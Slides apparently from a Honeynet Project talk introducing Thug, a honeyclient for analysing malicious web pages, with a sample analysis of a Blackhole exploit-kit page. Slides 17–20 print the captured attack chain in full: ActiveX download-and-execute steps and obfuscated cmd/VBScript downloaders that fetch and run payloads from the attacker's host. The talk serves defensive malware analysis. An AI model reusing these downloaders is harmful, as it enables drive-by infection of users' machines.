  • 11. Browser Personalities  Currently supported personalities:  Internet Explorer 6.0 (Windows XP)  Internet Explorer 6.1 (Windows XP)  Internet Explorer 7.0 (Windows XP)  Internet Explorer 8.0 (Windows XP)  Internet Explorer 6.0 (Windows 2000)  Internet Explorer 8.0 (Windows 2000)  And adding new personalities is really easy...
  • 12. Javascript  Google V8 Javascript engine wrapped through PyV8  “V8 implements ECMAScript as specified in ECMA-262, 5th edition, and runs on Windows, Mac OS X , and Linux systems that use IA-32, x64, or ARM processors”  “The V8 API provides functions for compiling and executing scripts, accessing C++ methods and data structures, handling errors, and enabling security checks”  Abstract Syntax Tree generation and inspection (static analysis)  Context inspection (dynamic analysis)  A lot of other potentially interesting features (GDB JIT interface, live objects inspection, code disassembler, etc.) exported through a clean and well designed API
  • 13. Vulnerability Modules  Python-based vulnerability modules  ActiveX controls  Core browser functionalities  Browser plugins
  • 14. Analysis  Static analysis  Abstract Syntax Tree (AST)  Static attack signatures  “Interesting” breakpoints identification for later dynamic analysis  Dynamic analysis  V8 debugger protocol  Libemu integration (shellcode detection and emulation)
  • 15. Logging • MITRE MAEC logging format • “Flat” log files (not so exciting maybe...) • MongoDB • HPFeeds  thug.events channel (URL analysis results published in MAEC format)  thug.files channel (downloaded samples)
  • 16. Future work  Document Object Model improvements  Javascript dynamic analysis improvements  Full integration with HPFeeds infrastructure  Exploit kits identification?  VBScript dynamic analysis?  Malicious PDF, JAR, SWF analysis?  Anomaly-based approach?
  • 17. Blackhole - 1/4 $ python thug.py -v "hxxp://myapp-ups.com/main.php?page=898e350e1897a478" [2012-03-06 15:51:06] <applet archive="hxxp://myapp-ups.com/content/GPlugin.jar" code="Inc.class"><param name="p" test="12" valu="12" value="vssMlggUk7MMahMzPJFUgYPMvM-Vc/oAd/G6cr"></param></applet> [2012-03-06 15:51:07] Saving applet hxxp://myapp-ups.com/content/GPlugin.jar [2012-03-06 15:51:07] <param name="p" test="12" valu="12" value="vssMlggUk7MMahMzPJFUgYPMvM- Vc/oAd/G6cr"></param> [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.15 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.14 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.13 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.12 [2012-03-06 15:51:07] Unknown ActiveX Object: shockwaveflash.shockwaveflash.11 [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream) [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application) [2012-03-06 15:51:07] [Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP) [2012-03-06 15:51:07] [Microsoft XMLHTTP ActiveX] Fetching from URL hxxp://myapp-ups.com/w.php?f=97d19&e=2 [2012-03-06 15:51:08] [Microsoft XMLHTTP ActiveX] Saving File: eed88603a141913f83bb58b4eacc88cf [2012-03-06 15:51:08] [Microsoft XMLHTTP ActiveX] send [2012-03-06 15:51:08] [Adodb.Stream ActiveX] open [2012-03-06 15:51:08] [Adodb.Stream ActiveX] Write [2012-03-06 15:51:08] [Adodb.Stream ActiveX] SaveToFile (.//..//467f705.exe) [2012-03-06 15:51:08] [Adodb.Stream ActiveX] Close [2012-03-06 15:51:08] [Shell.Application ActiveX] ShellExecute command: .//..//467f705.exe [2012-03-06 15:51:08] [Navigator URL Translation] ./content/ap1.php?f=97d19 --> hxxp://myapp- ups.com/content/ap1.php?f=97d19
  • 18. Blackhole - 2/4 [2012-03-06 15:51:09] Microsoft Internet Explorer HCP Scheme Detected [2012-03-06 15:51:09] Microsoft Windows Help Center Malformed Escape Sequences Incorrect Handling [2012-03-06 15:51:09] [AST]: Eval argument length > 64 [2012-03-06 15:51:09] [Windows Script Host Run] Command: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Code: cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Downloading from URL hxxp://myapp- ups.com/content/hcp_vbs.php?f=97d19&d=0 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 1] Saving file 2eceb44e291417dc613739fb258e0ac0
  • 19. Blackhole - 3/4 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Code: w=3000:x=200:y=1:z=false:a = "hxxp://myapp-ups.com/w.php?e=5&f=97d19":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")) On Error resume next c.open OT, a, z:c.send() If c.Status = x Then d.Open:d.Type = y:d.Write c.ResponseBody:d.SaveToFile b:d.Close End If Set w=CreateObject(StrReverse("llehS." & "tpi"&"rcSW")) Eval(Replace("W.ex2c b", Month("2010-02-16"), "E")) W.eXeC "taskkill /F /IM wm" & "player.exe":W.eXeC "taskkill /F /IM realplay.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "" & StrReverse("bv.l") & "s"):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):Eval("g.Delete") [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Downloading from URL hxxp://myapp-ups.com/w.php? e=5&f=97d19 [2012-03-06 15:51:09] [Windows Script Host Run - Stage 2] Saving file eed88603a141913f83bb58b4eacc88cf
  • 20. Blackhole - 4/4 [2012-03-06 15:51:18] <param name="movie" value="content/field.swf"></param> [2012-03-06 15:51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [2012-03-06 15:51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e0461756c3deb) [2012-03-06 15:51:18] <param name="allowScriptAccess" value="always"></param> [2012-03-06 15:51:18] <param name="Play" value="0"></param> [2012-03-06 15:51:18] <embed allowscriptaccess="always" height="10" id="swf_id" name="swf_id" src="content/field.swf" type="application/x-shockwave-flash" width="10"></embed> [2012-03-06 15:51:18] [Navigator URL Translation] content/field.swf --> hxxp://myapp-ups.com/content/field.swf [2012-03-06 15:51:18] Saving remote content at content/field.swf (MD5: 027ddef75ff4f692196e0461756c3deb) [2012-03-06 15:51:18] Saving log analysis at ../logs/a201092c67a6fecf301a09f8dae985b2/20120306155105
  • 21. References  Jose Nazario, “PhoneyC: A virtual client honeypot” (LEET 2009)  The Honeynet Project, “Know Your Enemy: Malicious Web Servers” (http://www.honeynet.org/papers)  Google V8 Javascript engine (http://code.google.com/p/v8/)  PyV8 (http://code.google.com/p/pyv8/)  Libemu (http://libemu.carnivore.it/)  Pylibemu (https://github.com/buffer/pylibemu)
  • 22. Publicly available? Really?! Thug source code will be released just after this presentation! Download it at https://github.com/buffer/thug Comments and feedback welcome!
  • 23. Thanks for the attention! Questions? Angelo Dell'Aera <angelo.dellaera@honeynet.org>